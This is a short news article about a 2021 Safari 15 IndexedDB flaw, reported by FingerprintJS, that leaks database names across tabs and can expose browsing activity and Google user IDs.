Researchers have found a vulnerability in Apple’s Safari 15 browser, which allows websites to spy on browsing activity or other personal information. The anomalous behavior was identified by FingerpintJS, a browser fingerprinting service.
The problem lies in Apple’s implementation of IndexedDB. Websites can use the interface to create databases in the browser, store data in them and then retrieve them again. The same-origin policy actually ensures that only the domain with which the database was created can access it.
However, when a webpage interacts with a database on Safari 15 on macOS or any browser on iOS or iPadOS, “a new (empty) database with the same name is created in all other active frames, tabs, and windows within the same browser session.” — FingerprintJS explains. This means other websites can see the name of the database created by other websites.
The databases leaked in this way allows untrusted or malicious websites to “learn what websites the user visits in different tabs or windows.” The problem with this Safari bug goes beyond a clear violation of the user’s private data.
In addition, the databases may also contain personal information such as a user ID. Google, for example, handles it this way, explains the fingerprinting service provider. If users use their Google account on websites such as YouTube or Google Calendar, the unique, internal user ID is entered in the database name — which can be retrieved from other websites through the security gap.
With Google’s user ID, publicly visible information could be queried via an API. This means that a website could find out the identity of the user, explains FingerprintJS. In addition, several different accounts of a user could be linked. Apart from Google, a number of other websites would also name the databases with unique user IDs, including advertising networks.
FingerpintJS has also made a proof-of-concept that demonstrates the bug works and can be tested on Safari 15 or later on Mac, iPhone and iPad.
The vulnerability was reported on November 28, 2021, in the WebKit Bug Tracker, Safari’s browser engine. There is no update to date.